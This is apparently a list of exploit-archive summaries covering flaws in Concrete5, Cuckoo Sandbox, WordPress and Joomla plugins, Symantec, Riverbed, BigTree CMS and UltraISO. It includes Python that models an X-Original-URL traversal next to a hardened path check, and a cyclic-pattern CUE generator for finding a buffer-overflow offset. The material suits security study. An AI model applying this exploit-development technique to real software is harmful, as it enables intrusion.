The vulnerability exists because the path of the incoming request is retrieved with the Symfony framework's Request::getPathInfo() method, which lets the request path be supplied in certain HTTP headers (X-Original-URL among others). A path taken from such a header never passes through the URL decoding and path normalization that the web server applies to the request line, so it can carry "dot-dot-slash" sequences intact. An unauthenticated attacker could exploit this with a single HTTP request to include arbitrary .php files located outside the Concrete5 root directory, or files from the Concrete5 codebase itself, potentially gaining access to functionality that should not be reachable.
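The mechanism above, as an added example that is not code from the advisory or from Concrete5/Symfony: a small model of how an override header replaces the server-normalised path, the unsafe "map path info straight to a .php file" pattern beside a hardened containment check. The web root, the request, and the use of X-Rewrite-URL as one of the "other" headers are assumptions made for the example.

```python
import posixpath

# Constructed web root for the example; not a real deployment path.
WEB_ROOT = "/var/www/concrete5"

# Override headers consulted before falling back to REQUEST_URI.
# X-Original-URL is named in the advisory; X-Rewrite-URL is assumed here
# as one of the "others".
OVERRIDE_HEADERS = ("x-original-url", "x-rewrite-url")


def path_info_from_request(request_uri, headers):
    """Model of Request::getPathInfo(): a path supplied in an override
    header replaces the one the web server already normalised in
    REQUEST_URI, and nothing re-normalises it."""
    lowered = {k.lower(): v for k, v in headers.items()}
    for name in OVERRIDE_HEADERS:
        if name in lowered:
            return lowered[name].split("?", 1)[0]
    return request_uri.split("?", 1)[0]


def vulnerable_include_target(path_info):
    """The unsafe pattern: map the path straight to a .php file."""
    return WEB_ROOT + path_info + ".php"


def safe_include_target(path_info):
    """Hardened: normalise lexically, then require the result to stay
    under WEB_ROOT. On a live host also apply os.path.realpath so a
    symlink cannot point outside the root after normalisation."""
    joined = posixpath.join(WEB_ROOT, path_info.lstrip("/"))
    candidate = posixpath.normpath(joined)
    if candidate != WEB_ROOT and not candidate.startswith(WEB_ROOT + "/"):
        raise ValueError("path escapes web root: %r" % path_info)
    return candidate + ".php"


if __name__ == "__main__":
    # Constructed request: the server saw a clean URI, but the header
    # carries a traversal sequence the server never normalised.
    hdrs = {"Host": "example.test", "X-Original-URL": "/../../../tmp/evil"}
    pi = path_info_from_request("/index.php/dashboard", hdrs)
    print("path info:", pi)
    print("vulnerable:", vulnerable_include_target(pi))
    try:
        safe_include_target(pi)
    except ValueError as exc:
        print("hardened:", exc)
```

The check rejects the traversal on the resolved path rather than by searching the input for "../", so an encoded or oddly-joined variant that normalises outside the root is caught just the same.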
This exploit allows an attacker to spawn a calc.exe process with Administrator privileges on Cuckoo Sandbox versions <= 2.0.1. It assumes that the Cuckoo agent.py is running with Administrator privileges and that the attacker can reach the interface the agent listens on. For true remote code execution, an external host must be able to reach the XML-RPC port (8000 by default). The exploit can be used to deceive the detection system, potentially escape the sandbox machine, or attack sensitive systems.
This exploit performs blind SQL injection and bypasses payment verification in the Ultimate Membership Pro WordPress plugin. The vulnerability lets an attacker execute arbitrary SQL queries and bypass the payment check without any authentication.
The exploit takes advantage of a vulnerability in Inout Search Engine that allows an attacker to execute arbitrary code on the target server by injecting code into the engine name field.
This exploit allows an attacker to elevate privileges on a Windows 7 SP1 x86 system. It overwrites the HaliQuerySystemInformation function pointer, and because the original pointer is not properly restored afterwards, the system will eventually crash with a Blue Screen of Death (BSOD). The exploit spawns CMD.exe with SYSTEM rights.
The Decomposer component of the Symantec Antivirus scan engine, which unpacks various archive formats, is based on an outdated version (4.1.4) of the open-source unrar package. That version has multiple critical memory corruption bugs that were fixed in the current release (5.3.11). The publicly known vulnerabilities can result in remote code execution as NT AUTHORITY\SYSTEM on Windows and as root on Linux and Mac. This affects Norton Antivirus, Symantec Endpoint Protection and Symantec Scan Engine, as well as other Symantec products built on the core Symantec scan engine.
This exploit retrieves the administrator's username and MD5 password hash through a SQL injection vulnerability in the Joomla component Phil-a-Form, versions 1.2.0.0 and earlier.
The Riverbed SteelCentral NetProfiler and NetExpress virtual appliances are affected by multiple security vulnerabilities, including authentication bypass, SQL injection, arbitrary code execution, privilege escalation, local file inclusion, account hijacking and hardcoded default credentials. Details of further low-severity vulnerabilities are available in the accompanying PDF. The SQL injection vulnerability lets an attacker add a user account to the application's PostgreSQL database and thereby bypass authentication; it can be reproduced through the main web GUI login form.
The submitPageChange function in BigTree CMS <= 4.2.11 is vulnerable to SQL injection. It is called from two locations: /core/admin/modules/pages/front-end-update.php and /core/admin/modules/pages/update.php. An authenticated attacker can exploit the flaw by sending a specially crafted HTTP POST request to the /site/index.php/admin/pages/update/ endpoint and thereby execute arbitrary SQL queries.
The exploit achieves arbitrary code execution through a malicious CUE file that triggers a buffer overflow in UltraISO. The overflow can be used to run arbitrary shellcode, such as the Metasploit calc.exe shellcode used in this example.
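The crash-triage side of such a file-format overflow, as an added example that is not the exploit from the page: it writes a CUE sheet whose FILE path is an oversized cyclic pattern, so that the four bytes found in EIP after the target crashes can be mapped back to an offset in the field. Which field overflows, the offset, and the shellcode are not stated on the page and are not supplied here; the choice of the FILE path and the CUE skeleton are assumptions for the example.

```python
import string

# Constructed minimal CUE sheet. The assumption that the overflowing field
# is the quoted FILE path is ours; the page does not name the field.
CUE_TEMPLATE = 'FILE "%s" BINARY\r\n  TRACK 01 MODE1/2352\r\n    INDEX 01 00:00:00\r\n'

MAX_PATTERN = 26 * 26 * 10 * 3  # unique upper/lower/digit triples


def cyclic_pattern(length):
    """Metasploit-style non-repeating pattern (Aa0Aa1Aa2...). Every 4-byte
    window is unique, so the bytes landing in EIP after a crash identify
    a single offset in the overflowing field."""
    if length > MAX_PATTERN:
        raise ValueError("pattern limited to %d bytes" % MAX_PATTERN)
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(eip_value, length=MAX_PATTERN):
    """Map an EIP value back to its offset. Accepts the register as an int
    (little-endian, e.g. 0x41306141) or as the raw 4 ASCII bytes ('Aa0A').
    Returns -1 when the value is not part of the pattern."""
    if isinstance(eip_value, int):
        needle = eip_value.to_bytes(4, "little").decode("ascii", "replace")
    else:
        needle = eip_value
    return cyclic_pattern(length).find(needle)


def build_cue(field_length):
    """Return CUE text whose FILE path is a cyclic pattern of field_length."""
    return CUE_TEMPLATE % cyclic_pattern(field_length)


def write_cue(path, field_length=5000):
    """Write the crafted sheet to disk; returns the number of bytes written."""
    data = build_cue(field_length)
    # newline="" keeps the \r\n line endings exactly as built
    with open(path, "w", newline="") as fh:
        fh.write(data)
    return len(data)


if __name__ == "__main__":
    n = write_cue("crash.cue")
    print("wrote crash.cue (%d bytes)" % n)
    # After the crash, feed the EIP value back in to find the offset:
    print("EIP 0x41306141 -> offset", pattern_offset(0x41306141))
```

Open the generated file in the target under a debugger; the offset returned by pattern_offset for the faulting EIP is the length of padding to place before the return-address overwrite when the real payload is built.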